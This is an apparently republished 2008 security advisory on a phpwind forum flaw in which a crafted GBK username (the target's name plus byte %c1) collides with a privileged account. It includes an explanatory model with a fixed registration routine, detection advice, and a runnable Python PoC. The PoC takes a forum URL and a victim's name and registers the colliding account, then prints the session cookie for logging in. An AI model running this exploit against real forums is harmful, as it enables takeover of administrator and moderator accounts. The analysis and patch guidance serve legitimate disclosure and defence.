phpwind 0day Admin Privilege Leakage Vulnerability Exploit Program

by xloong on 2008-06-01 23:36:22

Night Fire: Lately, there have been a lot of vulnerabilities. Just a couple of days ago, the Flash 0day exploit generator was released, along with the dvbbs8.2 (access/sql) version login.asp remote injection vulnerability. Today, a phpwind management privilege leakage vulnerability has surfaced.

Vulnerability Release: [http://www.80sec.com/](http://www.80sec.com/)

Vulnerability Author: [email protected]

Vulnerability Vendor: [http://www.phpwind.com/](http://www.phpwind.com/)

Impact Scope: This vulnerability affects all versions of phpwind.

Severity Level: High

Vulnerability Description: phpwind is a widely used forum program in China. Because of a design error in the registration logic, anyone can obtain front-end administrator or moderator privileges and then perform arbitrary operations such as deleting posts.

Exploitation Method: An exploit is provided on [http://www.80sec.com/](http://www.80sec.com/).

Vulnerability Analysis: The forum's registration logic was designed without accounting for how the database stores the submitted username, so the program's own checks and the stored data disagree. By registering a user with carefully crafted data, one can gain administrative privileges. The PoC below registers a name made of the target user's name followed by the raw byte `%c1`, a GBK lead byte with no valid trail byte: the forum's duplicate-name check treats it as a new, unused name, while the database drops the invalid tail and stores the target's name again, so the new account ends up with a name identical to the privileged user's. (The truncation mechanism is inferred from the PoC; the original analysis states only that the crafted registration data yields administrative privileges.)

Patch Recommendation: Disable user registration until the vendor releases an official patch. Administrators should also check whether the attack has already been used against them: a user table that contains the same username more than once is the fingerprint of a successful registration, and the extra account should be removed.
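As an added illustration of the bug class the analysis describes and of the application-side fix the patch recommendation calls for (this is constructed example code, not phpwind's own), the following Python models a registration flow whose duplicate-name check runs on the submitted bytes while the database, in the way a non-strict MySQL server handles a column in a multi-byte charset, truncates the value at the first invalid GBK sequence. The `Forum` class, its in-memory user table and the name-keyed moderator lookup are assumptions made for the model, and `mysql_gbk_store` approximates the assumed database behaviour instead of talking to a real server.

```python
"""
Model of the username-collision bug class described in the advisory.
Constructed example, not phpwind's code: the forum, the user table and the
privilege lookup are simplified stand-ins chosen for the demonstration.
"""

# Constructed sample of a name that is valid GBK (the three characters of
# "administrator" in Chinese) and must survive storage unchanged.
VALID_GBK_NAME = "管理员".encode("gbk")


def mysql_gbk_store(raw: bytes) -> bytes:
    """Approximate how a non-strict MySQL server stores bytes in a GBK column:
    the value is cut at the first sequence that is not valid GBK.  This is an
    assumption about the target's database, the same one the PoC relies on."""
    out = bytearray()
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead < 0x80:                      # plain ASCII byte
            out.append(lead)
            i += 1
            continue
        if 0x81 <= lead <= 0xFE and i + 1 < len(raw):
            trail = raw[i + 1]
            if 0x40 <= trail <= 0xFE and trail != 0x7F:   # valid GBK pair
                out += raw[i:i + 2]
                i += 2
                continue
        break                                # invalid sequence: truncate here
    return bytes(out)


class Forum:
    """In-memory stand-in for the registration and privilege logic."""

    def __init__(self):
        self.users = {}            # uid -> username as the database stored it
        self.moderators = set()    # moderator names: privilege keyed by name

    def _name_taken(self, name: bytes) -> bool:
        return name in self.users.values()

    def register_vulnerable(self, name: bytes) -> int:
        # The duplicate check compares the submitted bytes ...
        if self._name_taken(name):
            raise ValueError("username already exists")
        uid = len(self.users) + 1
        # ... but the database keeps a different, truncated value.
        self.users[uid] = mysql_gbk_store(name)
        return uid

    def register_fixed(self, name: bytes) -> int:
        # Reject any name that is not valid GBK, so submitted == stored.
        try:
            name.decode("gbk")
        except UnicodeDecodeError as exc:
            raise ValueError("username contains invalid bytes") from exc
        # Compare against the form the database will actually keep.
        if self._name_taken(mysql_gbk_store(name)):
            raise ValueError("username already exists")
        uid = len(self.users) + 1
        self.users[uid] = name
        return uid

    def is_moderator(self, uid: int) -> bool:
        return self.users[uid] in self.moderators


def demo(fixed: bool) -> bool:
    """Register a moderator, then an attacker using the PoC's crafted name.
    Returns True when the attacker's fresh uid carries moderator rights."""
    forum = Forum()
    admin_uid = forum.register_fixed(b"admin")
    forum.moderators.add(forum.users[admin_uid])
    crafted = b"admin" + b"\xc1" + b"1"      # "admin%c11" as the PoC sends it
    register = forum.register_fixed if fixed else forum.register_vulnerable
    try:
        uid = register(crafted)
    except ValueError:
        return False
    return forum.is_moderator(uid)


if __name__ == "__main__":
    print("vulnerable forum grants moderator:", demo(fixed=False))   # True
    print("fixed forum grants moderator:", demo(fixed=True))         # False
```

`demo(fixed=False)` returns True: the crafted name passes the duplicate check and is stored as `admin`, so the new uid inherits the moderator's name. `register_fixed` closes the gap by rejecting names that do not decode as GBK and by comparing against the stored form. On a real deployment, running MySQL with `STRICT_ALL_TABLES` in `sql_mode` turns the silent truncation into an insert error, a second line of defence worth enabling independently of the application-level check.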

Vulnerability Status:

- Discovered on May 25, 2008

- Publicly disclosed by 80sec.com on June 1, 2008

No patch is currently available.

Original Source: [http://www.80sec.com/release/phpwind-exploit.txt](http://www.80sec.com/release/phpwind-exploit.txt)

Vulnerability Testing (Python):

```python
# -*- coding: utf-8 -*-
# Ported from the original Python 2 PoC to Python 3 (print(), urllib.request);
# the request it sends is unchanged.
import http.client
import sys
import urllib.error
import urllib.parse
import urllib.request

http.client.HTTPConnection.debuglevel = 1   # dump the HTTP exchange

cookies = urllib.request.HTTPCookieProcessor()
opener = urllib.request.build_opener(cookies)

# The registration e-mail used by the original PoC was lost to e-mail
# obfuscation on this page; any address the target forum accepts will do.
REG_EMAIL = "user@example.com"


def banner():
    print("")
    print("########################################################")
    print("Phpwind All Versions Management Privilege Leakage Vulnerability Exploit PoC")
    print("Copyright (C) 2006")
    print("[email protected]")
    print("80sec is a new small group dedicated to web security")
    print("http://www.80sec.com")


def usage():
    banner()
    print("Usage:\n")
    print(" $ ./phpwind.py pwforumurl usertoattack\n")
    print(" pwforumurl    Target forum URL, e.g., http://www.80sec.com/")
    print(" usertoattack  Target moderator or administrator with privileges")
    print(" The attack will register an account on the target forum identical to the target user")
    print(" The latest version allows login using UID")
    print(" Other versions allow login using Cookie + User-Agent")
    print("########################################################")
    print("")


usage()
if len(sys.argv) != 3:
    sys.exit(1)

# The target's name is followed by the raw byte %c1, a GBK lead byte with no
# valid trail byte, so the stored username collides with the target's.
target = urllib.parse.quote(sys.argv[2], encoding="gbk")
data = ("regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=%s"
        "&regemailtoall=1&step=2") % (target, "%c1", urllib.parse.quote(REG_EMAIL))
pwurl = "%s/register.php" % sys.argv[1].rstrip("/")

request = urllib.request.Request(
    url=pwurl,
    headers={"Content-Type": "application/x-www-form-urlencoded",
             "User-Agent": "80sec owned this"},
    data=data.encode("ascii"))

try:
    f = opener.open(request)
    # Success is signalled by the forum setting its session cookie on the
    # registration response.
    cookie = "; ".join(f.headers.get_all("set-cookie") or [])
    if "winduser" in cookie:
        print("Exploit Success!")
        print("Login with uid password @80sec or Cookie:")
        print(cookie)
        print("User-agent: 80sec owned this")
    else:
        raise ValueError("no winduser cookie in the response")
except (urllib.error.URLError, ValueError):
    print("Error! http://www.80sec.com")
    print("Contact root#80sec.com")
```

---

**Note**: The above content includes a description of a vulnerability and its exploitation method. Please ensure that any use of such information complies with legal and ethical standards. Unauthorized testing or exploitation of vulnerabilities on systems without permission is illegal and unethical.